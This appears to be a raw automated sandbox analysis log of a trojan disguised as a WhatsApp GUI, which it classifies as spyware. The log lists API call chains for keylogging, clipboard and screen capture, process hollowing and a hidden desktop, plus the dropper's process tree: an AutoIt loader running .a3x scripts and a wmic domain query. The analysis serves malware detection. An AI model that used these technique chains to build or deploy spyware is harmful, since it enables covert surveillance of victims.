Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.hellofax.com/
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.hellosign.com/
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.paypal.com/sdk/js

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Uses secure TLS version for HTTPS connections

Source: unknown	HTTPS traffic detected: 162.125.65.18:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.5:49712 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\ProgramData\addbage\Autoit3.exe

Code function: 8_2_00CB4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

8_2_00CB4632

Source: C:\ProgramData\addbage\Autoit3.exe

Code function: 8_2_00CB4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

8_2_00CB4830

Source: C:\ProgramData\addbage\Autoit3.exe

8_2_00CB4632

Source: C:\ProgramData\addbage\Autoit3.exe

Code function: 8_2_0472B188 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,

8_2_0472B188

Source: C:\ProgramData\addbage\Autoit3.exe

Code function: 8_2_00CA0508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

8_2_00CA0508

Source: C:\ProgramData\addbage\Autoit3.exe

Code function: 8_2_00CCD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

8_2_00CCD164

Source: Yara match

File source: Process Memory Space: UpdaterService.exe PID: 2876, type: MEMORYSTR

Protection of GUI

Source: C:\ProgramData\addbage\Autoit3.exe

Code function: 8_2_04742170 OpenDesktopA,CreateDesktopA,SetThreadDesktop,CreateProcessA,

8_2_04742170

System Summary

Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_04744478 NtOpenProcess,	8_2_04744478
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_04744420 NtQueryObject,NtQueryObject,	8_2_04744420
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_047444C8 NtQuerySystemInformation,NtDuplicateObject,NtClose,NtClose,NtClose,NtClose,NtClose,NtClose,NtClose,	8_2_047444C8
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_0474476C Sleep,TerminateThread,NtClose,NtClose,	8_2_0474476C
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_047443EC NtDuplicateObject,NtClose,	8_2_047443EC
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_04722CF0 BeginPaint,SetBkMode,TextOutA,EndPaint,PostQuitMessage,NtdllDefWindowProc_A,	8_2_04722CF0
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_0471AF84 GetCurrentProcessId,OpenProcess,InitializeProcThreadAttributeList,GetProcessHeap,RtlAllocateHeap,InitializeProcThreadAttributeList,UpdateProcThreadAttribute,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount,	8_2_0471AF84
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_0471B2A4 GetCurrentProcessId,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount,	8_2_0471B2A4

Source: C:\ProgramData\addbage\Autoit3.exe

Code function: 8_2_00CA42D5: CreateFileW,DeviceIoControl,CloseHandle,

8_2_00CA42D5

Source: C:\ProgramData\addbage\Autoit3.exe

Code function: 8_2_00C98F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

8_2_00C98F2E

Source: C:\ProgramData\addbage\Autoit3.exe

Code function: 8_2_00CA5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

8_2_00CA5778

Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Code function: 0_2_0190D55C	0_2_0190D55C
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Code function: 0_2_091EB75A	0_2_091EB75A
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Code function: 0_2_0A520AB0	0_2_0A520AB0
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Code function: 0_2_0A52CB10	0_2_0A52CB10
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Code function: 0_2_0A5258D0	0_2_0A5258D0
Source: C:\ProgramData\Updater\UpdaterService.exe	Code function: 3_3_0464B46F	3_3_0464B46F
Source: C:\ProgramData\Updater\UpdaterService.exe	Code function: 3_3_0464B46F	3_3_0464B46F
Source: C:\ProgramData\Updater\UpdaterService.exe	Code function: 3_3_046934EA	3_3_046934EA
Source: C:\ProgramData\Updater\UpdaterService.exe	Code function: 3_3_046934EA	3_3_046934EA
Source: C:\ProgramData\Updater\UpdaterService.exe	Code function: 3_3_04640655	3_3_04640655
Source: C:\ProgramData\Updater\UpdaterService.exe	Code function: 3_3_04640655	3_3_04640655
Source: C:\ProgramData\Updater\UpdaterService.exe	Code function: 3_3_04634164	3_3_04634164
Source: C:\ProgramData\Updater\UpdaterService.exe	Code function: 3_3_04634164	3_3_04634164
Source: C:\ProgramData\Updater\UpdaterService.exe	Code function: 3_3_0464510E	3_3_0464510E
Source: C:\ProgramData\Updater\UpdaterService.exe	Code function: 3_3_0464510E	3_3_0464510E
Source: C:\ProgramData\Updater\UpdaterService.exe	Code function: 3_3_0463A373	3_3_0463A373
Source: C:\ProgramData\Updater\UpdaterService.exe	Code function: 3_3_0463A373	3_3_0463A373
Source: C:\ProgramData\Updater\UpdaterService.exe	Code function: 3_3_04671862	3_3_04671862
Source: C:\ProgramData\Updater\UpdaterService.exe	Code function: 3_3_04671862	3_3_04671862
Source: C:\ProgramData\Updater\UpdaterService.exe	Code function: 3_3_0463F801	3_3_0463F801
Source: C:\ProgramData\Updater\UpdaterService.exe	Code function: 3_3_0463F801	3_3_0463F801
Source: C:\ProgramData\Updater\UpdaterService.exe	Code function: 3_3_0467B8F4	3_3_0467B8F4
Source: C:\ProgramData\Updater\UpdaterService.exe	Code function: 3_3_0467B8F4	3_3_0467B8F4
Source: C:\ProgramData\Updater\UpdaterService.exe	Code function: 3_3_0463EA86	3_3_0463EA86
Source: C:\ProgramData\Updater\UpdaterService.exe	Code function: 3_3_0463EA86	3_3_0463EA86
Source: C:\ProgramData\Updater\UpdaterService.exe	Code function: 3_3_04649A96	3_3_04649A96
Source: C:\ProgramData\Updater\UpdaterService.exe	Code function: 3_3_04649A96	3_3_04649A96
Source: C:\ProgramData\Updater\UpdaterService.exe	Code function: 3_3_0464B46F	3_3_0464B46F
Source: C:\ProgramData\Updater\UpdaterService.exe	Code function: 3_3_0464B46F	3_3_0464B46F
Source: C:\ProgramData\Updater\UpdaterService.exe	Code function: 3_3_046934EA	3_3_046934EA
Source: C:\ProgramData\Updater\UpdaterService.exe	Code function: 3_3_046934EA	3_3_046934EA
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00C4B020	8_2_00C4B020
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00C41663	8_2_00C41663
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00C49C80	8_2_00C49C80
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00C623F5	8_2_00C623F5
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00CC8400	8_2_00CC8400
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00C76502	8_2_00C76502
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00C4E6F0	8_2_00C4E6F0
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00C7265E	8_2_00C7265E
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00C6282A	8_2_00C6282A
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00C789BF	8_2_00C789BF
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00C76A74	8_2_00C76A74
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00CC0A3A	8_2_00CC0A3A
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00C9EDB2	8_2_00C9EDB2
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00C6CD51	8_2_00C6CD51
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00CC0EB7	8_2_00CC0EB7
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00CA8E44	8_2_00CA8E44
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00C76FE6	8_2_00C76FE6
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00C633B7	8_2_00C633B7
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00C494E0	8_2_00C494E0
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00C5D45D	8_2_00C5D45D
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00C6F409	8_2_00C6F409
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00C4F6A0	8_2_00C4F6A0
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00C616B4	8_2_00C616B4
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00C5F628	8_2_00C5F628
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00C678C3	8_2_00C678C3
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00C6DBA5	8_2_00C6DBA5
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00C61BA8	8_2_00C61BA8
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00C79CE5	8_2_00C79CE5
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00C5DD28	8_2_00C5DD28
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00C61FC0	8_2_00C61FC0
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00C6BFD6	8_2_00C6BFD6
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_04716438	8_2_04716438
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_0471A79C	8_2_0471A79C
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_0472EC00	8_2_0472EC00
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_0473B1B8	8_2_0473B1B8
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_04739BD0	8_2_04739BD0

Source: C:\ProgramData\Updater\UpdaterService.exe	Code function: String function: 04644620 appears 52 times
Source: C:\ProgramData\Updater\UpdaterService.exe	Code function: String function: 0463CA55 appears 36 times
Source: C:\ProgramData\Updater\UpdaterService.exe	Code function: String function: 0463B5E0 appears 64 times
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: String function: 046F4904 appears 92 times
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: String function: 00C68B30 appears 42 times
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: String function: 046F4394 appears 101 times
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: String function: 047221B8 appears 36 times
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: String function: 00C60D17 appears 70 times
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: String function: 00C51A36 appears 34 times
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: String function: 046F4668 appears 48 times
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: String function: 046F6980 appears 111 times

Source: Whatsapp-GUI.exe, 00000000.00000002.3099328555.00000000015AE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameclr.dllT vs Whatsapp-GUI.exe

Source: classification engine

Classification label: mal57.troj.spyw.evad.winEXE@10/12@2/3

Source: C:\ProgramData\addbage\Autoit3.exe

Code function: 8_2_00CAA6AD GetLastError,FormatMessageW,

8_2_00CAA6AD

Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00C98DE9 AdjustTokenPrivileges,CloseHandle,		8_2_00C98DE9
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00C99399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		8_2_00C99399

Source: C:\ProgramData\addbage\Autoit3.exe

Code function: 8_2_00CAB976 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

8_2_00CAB976

Source: C:\ProgramData\addbage\Autoit3.exe

Code function: 8_2_00CA4148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

8_2_00CA4148

Source: C:\ProgramData\addbage\Autoit3.exe

Code function: 8_2_00CAC9DA CoInitialize,CoCreateInstance,CoUninitialize,

8_2_00CAC9DA

Source: C:\ProgramData\addbage\Autoit3.exe

Code function: 8_2_00CA443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,

8_2_00CA443D

Source: C:\Users\user\Desktop\Whatsapp-GUI.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Whatsapp-GUI.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3116:120:WilError_03

Source: C:\ProgramData\Updater\UpdaterService.exe

File created: C:\temp\

Jump to behavior

Source: Whatsapp-GUI.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\ProgramData\Updater\UpdaterService.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ProgramData\Updater\UpdaterService.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: Whatsapp-GUI.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\Whatsapp-GUI.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Whatsapp-GUI.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Whatsapp-GUI.exe "C:\Users\user\Desktop\Whatsapp-GUI.exe"
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process created: C:\ProgramData\Updater\UpdaterService.exe "C:\ProgramData\Updater\UpdaterService.exe" "C:\ProgramData\Updater\ConfigUpdater.a3x"
Source: C:\ProgramData\Updater\UpdaterService.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c wmic ComputerSystem get domain > C:\ProgramData\addbage\gcdkfcc
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic ComputerSystem get domain
Source: unknown	Process created: C:\ProgramData\addbage\Autoit3.exe "C:\ProgramData\addbage\Autoit3.exe" C:\ProgramData\addbage\ffdghbb.a3x
Source: unknown	Process created: C:\ProgramData\addbage\Autoit3.exe "C:\ProgramData\addbage\Autoit3.exe" C:\ProgramData\addbage\ffdghbb.a3x
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process created: C:\ProgramData\Updater\UpdaterService.exe "C:\ProgramData\Updater\UpdaterService.exe" "C:\ProgramData\Updater\ConfigUpdater.a3x"	Jump to behavior
Source: C:\ProgramData\Updater\UpdaterService.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c wmic ComputerSystem get domain > C:\ProgramData\addbage\gcdkfcc	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic ComputerSystem get domain	Jump to behavior

Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\ProgramData\Updater\UpdaterService.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\ProgramData\Updater\UpdaterService.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\Updater\UpdaterService.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\Updater\UpdaterService.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\ProgramData\Updater\UpdaterService.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\Updater\UpdaterService.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\ProgramData\Updater\UpdaterService.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\ProgramData\Updater\UpdaterService.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\Updater\UpdaterService.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\Updater\UpdaterService.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\ProgramData\Updater\UpdaterService.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\ProgramData\Updater\UpdaterService.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\ProgramData\Updater\UpdaterService.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\Updater\UpdaterService.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\Updater\UpdaterService.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Section loaded: userenv.dll	Jump to behavior
